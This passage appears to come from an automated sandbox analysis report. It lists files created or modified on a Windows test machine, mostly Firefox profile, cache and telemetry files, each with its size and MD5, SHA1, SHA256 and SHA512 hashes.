3466b3302b6c006c2711d2b81933b517a0834653f478ce2e895279deda95931e

SHA512
64ac221b8401a829de63a8e23b2018c2b8edcdd69745be21263df853c128f98af7601f8eee2039c2463143eb8da88ccbe39d66ab12898c56dcd7c20d0fe102aa

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\D90B3541503C051ED8EAD2FB1EC93984EC23747F

Filesize
75KB

MD5
7dc982f6ce5149a6de7d3f446a04d2d4

SHA1
292507ca3f0c54aa32c9e56cd2f2d2701c7b9c25

SHA256
b2352ec6586838d77cb53e6d66b67ccf2e216ab9003cce54c4b6f8c96978e6d8

SHA512
008b227bf8de50a252b41ca7bdafa78aa49d10a5c1cdcb4428cd705d44eb9ddbfeb4a6c948db3f6711fec1b4294b361f631194cf14fe6fa315a1d2b274ae04d6

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\D9F16153CB9C97F4D2A9F8E1B91C4B95BDD5230B

Filesize
208KB

MD5
320d9b6ba8c298824cb7c03d7749a219

SHA1
84d42b4e06591271cb012db8cbb3e2ff75a963c4

SHA256
9ad8514ba9f06eab7682fc8f5f5003e37d6b821ae0e2dbdb4d918fb238373ea5

SHA512
ca85deee385fce01efa40b55f92dcab229eb5f4ebec0c1bcab2917d0a5df25f8454239039e7234de973901f73a3873bbc542e386ad2d3675e3bc1c6cadfa40ae

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\DEA7DE6012877F4D7DA78D0415CB68F94B2F7670

Filesize
4.7MB

MD5
132b68f54bd4c4d7b42e1782cdc2744c

SHA1
4fd3a79f56ccf2d045e7bbeca799a65589e8f9e3

SHA256
bff6c395659e76202000873d223b1b00dd3ac21e9232d179fa7cb625a68296ac

SHA512
6180e5d2193667dfc1ee49a705b3412e5a11fa7a4f9e0786b2797567cafd666ee4647e03756d94e4d5c40c6c03dc6ea9f9424b8db6b92d6d8fba7c8bb17d3e7c

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\E9E3E61FDD0154AFB47CF4BB44A6096D1124E5BD

Filesize
215KB

MD5
3ef0ce9e411c3710aa59301c1d6b2fbd

SHA1
1d9e7be7003d6339024405380761d5623a917db0

SHA256
89bacd9ede3d0c83e25cbbeadd86b322ddd23ef0d8a5228ea98c783c60eef328

SHA512
625f854404be7c03c7f146884c4744ba47c57ae639e41ef47d101115b3cb2fc28c398a71e952fe1ddec69e48d26df074a866cf5acc47dde9606d959c36115cb4

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\ED2FC692CF2CDBD4A7DFA81659DBCCFCF4514628

Filesize
17KB

MD5
05afe8f806fd68fd1633ce040fef235a

SHA1
88fa722675aa7c8abb26ded120b4c4618195d2a2

SHA256
28771196c92bc6400138c09306198258904592c21a1cc1370e4eff47922f6306

SHA512
9f60ef0af527b64bab6385b7c1036fb94e1f0d419bff76333b0e4a8ddf5abcdff8e30d3e11f06ba43e243d1f01f91214bf504731281c35d5b2763f165236a70d

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\F8CBD54DDA10F4286A41EC6A537240712D6C2308

Filesize
9KB

MD5
0e666dcb8ef30db8a0406a954c17b16c

SHA1
6aeb91c2eb16f51a2adff009301e0afed8d94ee9

SHA256
e50c0d09e4c7e2799a7d98580e9b5b507c621c8941e976bbb634432227be16cd

SHA512
0c22c91b1e31c9fd3a417ee15d7c81daa9fd57bb5e86c9a00adeff9507fe0077296c37cf88e0877d337202bbde9944988bb728f47585d81fcf06f7b156d8dd88

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\F8F1C3686BAADE279E67C60E59DE20379D28C5CB

Filesize
23KB

MD5
8096da5daa825a41848425cba728d1c7

SHA1
15c7dbea7b1724b10f31525c47a65b5ffe528949

SHA256
250b5244fe14738a4dffb906363101335cae31c159192cea9d2f6a72986373f3

SHA512
bc6c11f51104e21da5d2f31b940bfff412f6fa02399c9d52fc9f3662106112424eba80ca701f550fe8cc6be8c1f1b65d29beda706dca0ab63ca77586061124f2

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\entries\FECDB573B4F56E9F9065200451824516A9A776E2

Filesize
377KB

MD5
d22d6fc3f0f5062382014fe690aa5e02

SHA1
9d07414592e169e524551af23adecce7e0173902

SHA256
ce4f9929993d38cdd23bc6042c6dfd543f8f9f72130fc34909d043e07d530367

SHA512
b2e2c43cd958ee0aab526f116a8542ab05332edc73fcc45b824db5621f313ec54926f09a22c94407a3300a9ea28c3ee0f389fd56f7302d3de6a5cb5d89235e49

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\index

Filesize
108KB

MD5
4a1385db85a82419a0ead43de750eaac

SHA1
4709a4cbb373a3857749a7aa81d78cff3d58afb5

SHA256
8d29a1b56b0daa6edac4dd5c11aab230815b5239c01d05f5c2e977698bd35bcb

SHA512
f3fbeca802770f56af561758110eafa66a4ae032f397741906fb9cc644f9e8f5126dfbcb7a4417b28486695f54455673752a239d2104e458a32c20a127f289fd

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\index.log

Filesize
2KB

MD5
613f5d21a6ae63d2ac537d742c2b79fb

SHA1
e3c0942f99e3ff7138c7f0fdfd0809ae7474e3ef

SHA256
6c18edc6073db6311255a676c4aa3cbc2a952f07af65cbdb9c29b00a4970f2b7

SHA512
5c73c48c0be64758c0814e6e82628d37fc4a7727db8708cd73318339deb8abf0de06319072ee02332fb0baf3c960321b7974346a9620834a5704c5e72ff7bce5

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cache2\index.log

Filesize
1KB

MD5
8e84a9ed1e81b7e7b9cd34bfab3ad468

SHA1
901cc22518f4fe71bce8864880c99773016a7932

SHA256
bcac8445fdf6505002c0525689c8525780244cfe8c5f2ea64db501261b0b7d46

SHA512
564266e698e84c94e06a50e4b221f0caa1f72f6f56e9d82a0d907fb141e63c9d1cff1b51fa7192a2494c1cdaee69a0ec5efb00834ca7b01840e9d42bee907134

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\jumpListCache\Yl94Pg_csRzW2Onff6QAw6YUX0_InXm4V1opWMVhDSI=.ico

Filesize
513B

MD5
d3f68cc41163d7472d6d4a89551177ad

SHA1
44ff6fea3a9d2a8db575a257207cfb45ef742beb

SHA256
57239ea501adebb8a65db075f464fd043507c8e701908a292a1cc2893b1df3ed

SHA512
049fbcbe5f522736cae4bc6099b9550444c3ba42d70bd78105520c353178954a0b6e2f33bda337969ed40a537b6120551a06de019384d635b3f82ea4421a1c87

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\jumpListCache\_xIoWIQynwQgoZEI6LFqAVCHNXGBh43d09EplmdSFdU=.ico

Filesize
691B

MD5
42ed60b3ba4df36716ca7633794b1735

SHA1
c33aa40eed3608369e964e22c935d640e38aa768

SHA256
6574e6e55f56eca704a090bf08d0d4175a93a5353ea08f8722f7c985a39a52c8

SHA512
4247460a97a43ce20d536fdd11d534b450b075c3c28cd69fc00c48bdf7de1507edb99bef811d4c61bed10f64e4c788ee4bdc58c7c72d3bd160b9b4bd696e3013

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

Filesize
13KB

MD5
f99b4984bd93547ff4ab09d35b9ed6d5

SHA1
73bf4d313cb094bb6ead04460da9547106794007

SHA256
402571262fd1f6dca336f822ceb0ec2a368a25dfe2f4bfa13b45c983e88b6069

SHA512
cd0ed84a24d3faae94290aca1b5ef65eef4cfba8a983da9f88ee3268fc611484a72bd44ca0947c0ca8de174619debae4604e15e4b2c364e636424ba1d37e1759

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\startupCache\scriptCache-child.bin

Filesize
462KB

MD5
24d6c20c2371bb9028a30bf2a6c873cb

SHA1
0c3e9dd4ae0d70fa241ff9c9104bc8800a8e703c

SHA256
5531f258fd34995aad0248d4781fa9182332fdad29406e3dee6d99fc2b7205ee

SHA512
a06ec9cc88980c6a9c8f18f65a205599f49eb62071d5a06e0328853de9e888687eb6eba70d7f0e4bc8d403a5cff532d2f93defbeefa3d469986c0466d8e02dc9

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\startupCache\scriptCache-child.bin

Filesize
469KB

MD5
548fd2001a067c9fea9453e7a51ae080

SHA1
9ea13cbd97e46f0235dc45a57d03dff824892c8a

SHA256
93907df64cc317113b0933101e6a6014eb3cb4e45214f7a672773d365af65c6e

SHA512
ab7a996e5b0291ea24839ff0181926f385433220d0fad11dda275c7a5bd51a7ff1b3505474f315e7793e7fd9b8ee50505532615651e50b1a2f4f824b7548b824

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\startupCache\scriptCache.bin

Filesize
8.9MB

MD5
5968ec60b8200ef473ce6794f6fc8047

SHA1
bda32dd55b1f81075ee75d94199262b978f1f5fc

SHA256
7e79a9ec597ebcae174b368c5c68d5827c1d2034d6f609e77399e968038b7fe6

SHA512
d07a09420fb57fb848427bdc30d478549a04a5912f0cfc8c145202d976736fb7b1152cf4ec131b4e6a9f7dc314876006795dfaccb51b00246c077a6bd2a7de6c

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\startupCache\scriptCache.bin

Filesize
8.9MB

MD5
673490b228de5f5911bc49ffd7ce1f25

SHA1
5506a625d55bbab3a4b7fe5c0855edba6f4226c7

SHA256
4508fff709684171da0a1fc19628308e40d1e9af939f4e775f92b4d22eb0b866

SHA512
5afcebd05134f30748da3479d63cd5e19ed6a547aac5da98ed4239a1ac9f83b3bfaa60e8223eba176965b62166aace45daddf7da50aaf3501b987892567fb83a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\startupCache\urlCache.bin

Filesize
2KB

MD5
ed9e6682b56b9311266bb7784e3f7d8c

SHA1
e189ed90811beb2ad82d153548456c6d9e2ba9ed

SHA256
5da75fb857f324165143e381c969ba9e7289493e71cd7eb3e67958d72fa43fa0

SHA512
aa225eb3f97503c4423a036cc8bcc28ef14930026ed6c3c085cbb3cb9f211038231ced4659c5b72f1dbcddc9be1a0d025fc2e34e06844511d3a24e2eb7a016b0

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\startupCache\urlCache.bin

Filesize
2KB

MD5
4a334fb3f67980e55a7fd3a26fc2886d

SHA1
24a8ae5663b0604558399dce2949b0ed6884ada6

SHA256
6c7593ed320c5cbb5d2fda94986ad3798d6d7e755ae38c29f8572df196ab8076

SHA512
787c7c48babb5a64a9c9786a7086042096c7146edf8415297ed2b4c37e6886c842b2923612c9c7e20e9c8e52fe9f5d8f481bcfad2be25d57f30a616755779360

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\startupCache\webext.sc.lz4

Filesize
107KB

MD5
47f04d6e9881e1d9690cd21863b16d87

SHA1
ed150095b09a8dd8071493a4d2c2f097553acaf3

SHA256
6397fc534f5f91e28df7d133ee1fd778ca38846473b8b441339cf7a16eaabd88

SHA512
5e305f3599decd0965f4072508f5b8f408205850ef8ef2bded8d133ef8a4cd8e4db0eead31d92c316a741b6f92189a6fdaecd152a3024d9292be4e7ca11c3afe

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5l9wod5l.default-release\thumbnails\2ebe010a56336d6aae3038b9444d3a26.png

Filesize
51KB

MD5
908564804d6abda5d60c0621fa1ececd

SHA1
9a774027349eb68395b48d335402ecd81cbd3345

SHA256
3e046a0c9cced583583807c6125d0ee038386fe4b686e17726921fa75db961b8

SHA512
61257a49177162e42629060f15358e4fe470d1f3178f88b6781ae354aefa5780f49e1833711b43cd4ac5c1bf00d28b6bfc330a0db0fd4a28b0a7f04b3876e9c5

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\4bf4d11e-57a3-46f9-b884-3268fa181c10.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rar$SF3104.34980

Filesize
309KB

MD5
89bf0f7e9adf290c6d571eccf79206a9

SHA1
65f95791234ff93bc3e35f1d35d7a6664872dc56

SHA256
b11ad1adfa96eacf5f18cf87785884947a6d35a1baebf4f20f16402b04d5109f

SHA512
cfa060f8aa79529fe8a4809ed5faec499fd15bcd4fb4a536759890e536ded2ca26e593b1f8b04d94e998b063a9a9b8b6bb53166976a5cd018913819959dbc7d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_arnwr0kn.cro.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\40371339ad31a7e6.customDestinations-ms

Filesize
5KB

MD5
f93aafcadc801cad01508f9e083e878d

SHA1
e7a8eb8639f55392b997f729e579bb311070a9ac

SHA256
b2fed943588c9635a67f777e72e8876b05488c70b0d4e7bca63f15863c2632f2

SHA512
0085dfcf6ed6d2dcd1e93bad9ed1edb253e0188c44885f0fa2472b9bb3713a44adf4eb1ecea82182cafef881b976e6a483d713e3ecca3d0d8c37a9ae81a23245

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\40371339ad31a7e6.customDestinations-ms

Filesize
5KB

MD5
1003ca0400dc41daeb3845d54190fbdc

SHA1
e2bdd08dc14a14d4041587cb0a55e9a316f71c84

SHA256
5409dc2927baf43f4f407496cbb201c2dcebfb930a6364fc953ffa2e84c3dc37

SHA512
b3eaa012c2c10e95e8b330533990439f9c8a4eb485a2819051e45a8c9e505d192c80a4898654481a992a5debe36888b59db6f817a0ea8e088ed776e55e8045b2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
20KB

MD5
c1928406396d21711a49e0fab236fd57

SHA1
7ffd3abe8bc2e9565852dfd3bf6aca847089d57f

SHA256
c1e3503e994e48f6ede26d1be58e0df439d2318482fa7bd90684106f6efdfd7f

SHA512
8edfad401ba53d11247160ba5ac2ede73686252691fdc64d46d555ca2fc5614e85c35e24854e4cf6780f62377d4b6da5119d19f2c8070163665a73cadbd8638d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
20KB

MD5
13a254781174d2af7375af7441dd2043

SHA1
66cea9433b72ca8ef6221df5e4ba2c96bce11b5b

SHA256
f93f61fdb2fee3dfc6318d08d8d2b742b6173a735a702ef23f266d3bf900a31f

SHA512
2de597186c7efe62c2ccba5906412ed7a9159d958b59bc36ad4a97dae7539c1be8bb3b323aab02ba6897184c280268dba1c0e3a595dca453960c0895fd6fefc3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
19KB

MD5
4e262211d0add095d3e3fd53fc85d80e

SHA1
c8ee01165d24d768adb4d1c6871340ec4f82b24a

SHA256
648a1895225e1ab823a5e570a57f9f4c54c8b451ecadf0197dc600d053cc0d8f

SHA512
51b3ed2f15afc1aabed3e27ee5f257bd77f6045731663b7a301624f528176c759b1efb76db729e4dd1326e3120784ebb73ea973d54eab937b03ffa094fea5b41

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
19KB

MD5
a5edabe87364388e4ae30194d764e9c0

SHA1
a7739d3de4dd6479482286df3c8014fd0eeeec63

SHA256
9c41251562cbca9a611e43ea94b40849b6c9708fa9f4a3e988003caf6244ed19

SHA512
aac16c50b4a4ec62968405b883e2a4b5047e563df354f486375ec2d75a77242524e0ca09237c5b6a8cd2d38fc3183af08c08a8eb435a127b30d8108adcf7976c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
20KB

MD5
b1890d75880d6a1ced8fdba64c08bf11

SHA1
8aa9c98e27f329491a04412fa61c53e105960d7c

SHA256
ca4df171db8301d8cd50cafbca5fe916f0568678072db171383859004c79dce2

SHA512
7d3208bc4684388aad76e8b125534066ae421e8c9482141088ea0b103ccf0a89dc6b1ec70d3dda7b4febba4ad418ff8e3f8148c22870c2fa738525402381a890

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
19KB

MD5
31bba64ab144884304962d6b08ac077e

SHA1
8702ae138bc21f455e51836bc546edf05238ed86

SHA256
8828af837e9b99612af9777931867c2001f6db25f80bf8113b8ec5f0a6790c60

SHA512
8c121238829954959be7eab3de8e5f8601e608e52f94d656b0a2afa86a5129a68718c28d13540a37d34a49da35a5d28216d3d821c7bf8c51d1baf0ce2524e24e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
19KB

MD5
87807b46c20301d6b07e052f23b1466a

SHA1
afb216d100ad6e0da10fa8472dc6490b7073a52a

SHA256
6dabec84eff5c44124510f1a184834ae940c7de4d848ffbb32dc2613aedd33b2

SHA512
cc89172c078c520f3f19d774c210ad112dc2b68dee0d679220de5a0fb737f3e3abc1422521dd0781d214b3b95ceed8866e056becfe1e177fe1814fce4ea50971

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
19KB

MD5
0ced031254c14159a44fbd5a0feddf2f

SHA1
675e48b3f9afb7e4682621baaface562646948b2

SHA256
b4cf03b8e22ca44a4d859058ef8316a4e568fb47f9ba0cf4a2d7fe8a446a4fe8

SHA512
7a28dd3dfa68e36d6e2399459b4de1aae3a173a863ea5c8a793208d0a040556ed496ca32c2d55391dc2da1829fd204de36e511cbd6b2ee4b1cdff648a5ad6c22

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\AlternateServices.bin

Filesize
26KB

MD5
1da957d8d74b962c5815540eb5ea7e83

SHA1
ba027ca4807a0f850323c020945b813438d86e20

SHA256
360c8f636c7771f7beb48bc48be4647f69cbae7b46a93f89d2505d8d39f9ea13

SHA512
bfc2df264d604ad90cd21f8bc700f4f892f5c9d851f279dbbcbafe19ee9ea268f8365f3bbd0f1b3c73b88349bbcb4b15aef5c14eb881f413ae16d0ec47816b1d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\AlternateServices.bin

Filesize
7KB

MD5
6a25f1053e3cf4288b0235efa7103a5c

SHA1
c38581004fd2da45833a4abb78b7f88eeebe7bd7

SHA256
5f6d352c6b9ea7ddc872bb0f7012de3cf5cd3486d67a2bb3f6f57221967d1410

SHA512
9fcabe201c3b4a6b7d9902b4c6ddb8e3ded24fb21bac2ccc2124e228329172afe3350e0aa9d59f2872c16120009307ace40f4e3ce3382578be68952dba6deea6

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\AlternateServices.bin

Filesize
101KB

MD5
9a6ed7555a2ca290212ef2b6068bec0a

SHA1
bbd6baf94c82712674cf421b70fc17560fe62828

SHA256
c519c0a9aaad9a39384b81bed35b6765e29aac9a05e1cbfce4de6bf1924de500

SHA512
ad008f32857526d89beb099dfc97b447fccbd545b1a3601b3af7f8e5ca30c7a6bd36684705bd8903fea992f45d0d168a77017e3e60fe3e5e3fc2beb739feef02

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\AlternateServices.bin

Filesize
101KB

MD5
cdeb41718296ca82c4d85f778be40a15

SHA1
0b874e89b3b15b9bcd1d0af1335f8bfb582d43a9

SHA256
4584a6027383ab40a1700d4587f68e4e6ec32bde8f6fe6ba4321c4458628e760

SHA512
59513f1e46707683593a748f357e754da221570ee37ac85c66585c223b3b9498465c037b48740e882a4f5930d5455275bbb22fb3a991ee6b8056d20cfc1c17fd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\AlternateServices.bin

Filesize
101KB

MD5
7372e66bd0b3f9b901c9fb9cd35ce1bf

SHA1
8ec72226f10c4e2d39b45a0d2397ea2da1d5edb7

SHA256
c95854dabc3a0ae4574038eabc51680fcb662bd81d07e15facbc3bcb01a6c4a8

SHA512
36201821efb6075d35a22ab5814f07e560cb07571430660fc25bd938d3aadbde18bc530a17d903121c099d4204a180c781ace4af98e92252bfb2bc66a08db2e3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\SiteSecurityServiceState.bin

Filesize
2KB

MD5
d4aa9b66481183d1be756c163471f031

SHA1
a69094d238a91016c0b7a2a31df5796c559653f4

SHA256
39395f47f695da40dbea42c966449614d557d984d67ee43fad42ee7422dc9d3a

SHA512
e9fc3cac5e9d5f85b4c2bc62f0815ad030c87ffa5ee48042f3c94fbb04cd1be9e3e875c96c12fbe794412d3a1b869e6c98a577b27fa0713a01b1ecf30b969281

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\broadcast-listeners.json

Filesize
221B

MD5
613ad1a43cf71e25bf0775733416f2c7

SHA1
c2bcb33394066ead56e72cdc6197a40dda7d12ad

SHA256
fc0b30388769cf18c13106d2042062983916fc57978f319056f46d4a45d7041f

SHA512
748320d8b2d02b337c998a199032c225013254c314a86d0980a236527769b251e040ba27d81ef479884393335251a7fc76336055978b9cabce233ac51d5c7ed9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cert9.db

Filesize
224KB

MD5
fc78e87fbf7fef731ee065a3c720ba0b

SHA1
d74a4c011441589b689ac2d1b630ce5b173d0451

SHA256
34d1eb5538552bc417a1c4fdee78b98330d18089b9b48c43f056207544d2c940

SHA512
87d84d14081041fa64e8daa87a86d431d42e53082c52184b1fb4f296a8987854eea435226adbbfc022f2ffc5419d668d0a0dc7894078c86c6d5d13f7b5d997b7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\content-prefs.sqlite

Filesize
256KB

MD5
b41ed219e2c8dac47f2701562d092621

SHA1
90d507eae3ec943a121dbe5a080412e40470b54f

SHA256
cfed019635a1e14f74ae78f2c03fb96b40ac3da37b67489bd98c144afc200f1f

SHA512
5c6027ec701055efb3b6c055727af5ed261e8f1d5ba954e64e8a34e5c791679b1e4a6ef49896ab8089ec151fd758ba41efc7333611af42b851606a0544a9b947

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\cookies.sqlite

Filesize
512KB

MD5
e24d742f6648bc00fd8221d448777ffd

SHA1
8057cd1d1092ad75438c759957d635396f0dd5f7

SHA256
9e8d26e9cd23f55dedae3d2d20aa288fd38883b6e24be2afa36068d4119f4009

SHA512
8cf5a26960e6dc8ccbee6b0b8ca7fca2c540516820a2ecb61295587104c9406536260802159dc99f1c6a48a8ad805fe03ec5a705f5c2fefea3878b7db96353a1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\crashes\store.json.mozlz4

Filesize
66B

MD5
a6338865eb252d0ef8fcf11fa9af3f0d

SHA1
cecdd4c4dcae10c2ffc8eb938121b6231de48cd3

SHA256
078648c042b9b08483ce246b7f01371072541a2e90d1beb0c8009a6118cbd965

SHA512
d950227ac83f4e8246d73f9f35c19e88ce65d0ca5f1ef8ccbb02ed6efc66b1b7e683e2ba0200279d7ca4b49831fd8c3ceb0584265b10accff2611ec1ca8c0c6c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.bin

Filesize
79KB

MD5
b53356704da8a9918ec0d93b699d0585

SHA1
78e2db4510f546945bdb096dd11b8afe6686914e

SHA256
09d7b3f3c75f351fcbdcd36c6083f5e1714a295df0a64b19b2d4fb46f8d541bc

SHA512
0dd9f98494be4cb6d045449b11d25eb20ebb06915ba079fd5a1ae94c9d84a7cc3da15a41a5b593d572aeb1074bfcd0966bc9f3d224ddff558be7e40f171482ed

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.bin

Filesize
72KB

MD5
642cc83e0350cb4d28e229573e89202f

SHA1
735758819d38c93bba6e72e81e9cd01ae194a846

SHA256
e8bfac11009ed79f914faa2a325e366c664308ef26e3b97ddfd0171c4059ace0

SHA512
2fb07ea81b8439e5c1672d3fda86b58bad79ef11c2ee77a03f9fe32b7b973351e7750e85a4298a96022b683ac7cd7dec971734c08486701b729332d9a8663633

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
0a3f9a76960bdbe4fb36e9b6f88d0d7d

SHA1
b15e39206bfb260994c70ff716b3328b96f73083

SHA256
da4687a730bd5071c6772e15a136ce54cf07aa3c58c7f7f07854fca1472b885b

SHA512
dae81827fcc9efe68a288c65643553acd0f542a6db0422e3159b7ee03898d5480e76cf2a9b65017c426c3b1de7adb477cc3b7a77aa0be392e2450c6ebe17f609

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
f21bc331695bcd080d1795ff574dd31a

SHA1
9862b6d2f5095f4d40c728c5c1a118841acfa3a1

SHA256
72a0ca0f3957c46aaf90750f0855f922ad40915e8864ba1b81429120465acaa1

SHA512
d84830cf92e5f3b8404706ae8a6e3aefb3bba9165eacbae5c189ac4d141538b235b67d30bf5600109da2f54937ccdd9afd96de0c9cecf35bf6dd385a0be92cbc

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
79KB

MD5
eaaa8c163a3f5cd20e1c87a3e0e28c32

SHA1
d72c80ea9a79e31b4ca77d6f2f65c94e57944001

SHA256
e8c877d14a8cb54a7fb8c832bcf81cb2dee27676816e1aef3219a73277d328ee

SHA512
8adc1ba74de42ec351fc01aefb1dc10f74f76b6e76662be7ab094b4924c4178ef33cdd3adac975eaa817f7e65bb29a670dcc2777fd73c05b41dc401c5e29f716

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
115KB

MD5
f311daa0d99dc822c4cbfda47981ff3f

SHA1
f69d9a7d77ac65e0213b55028c1a13d648e404fb

SHA256
527805fcd49a70de65d6060b0f8f7b1091469b9d4995b562b2f84330d5eddf60

SHA512
43628391ef075b00fb5028f57ca4148f935a9627b7665894269a0d039a8259c01974995f89ab13e37edb10a3ca0ad908ec012d38c2a18b6342546444188b6d30

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5l9wod5l.default-release\datareporting\glean\db\data.safe.tmp

Filesize
75KB

MD5
